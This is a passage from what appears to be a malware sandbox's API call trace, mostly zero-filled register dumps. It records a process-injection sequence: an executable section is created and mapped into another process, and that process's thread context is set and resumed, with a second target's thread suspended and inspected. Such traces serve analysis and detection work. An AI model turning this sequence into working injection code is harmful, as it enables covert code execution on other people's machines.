[89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.660] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.660] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xcc200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xcd000) returned 0x0 [0139.669] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xcc200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x650000, SectionOffset=0x0, ViewSize=0xde6e8*=0xcd000) returned 0x0 [0139.682] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.685] NtClose (Handle=0x1a8) returned 0x0 [0139.685] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ee000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x689717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.704] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.704] NtClose (Handle=0x1a4) returned 0x0 [0139.704] NtClose (Handle=0x1a0) returned 0x0 [0139.705] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11b4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0139.705] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.705] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.705] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x393000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.705] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.714] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11b8) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0139.714] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.714] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x25c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.728] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x393000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, 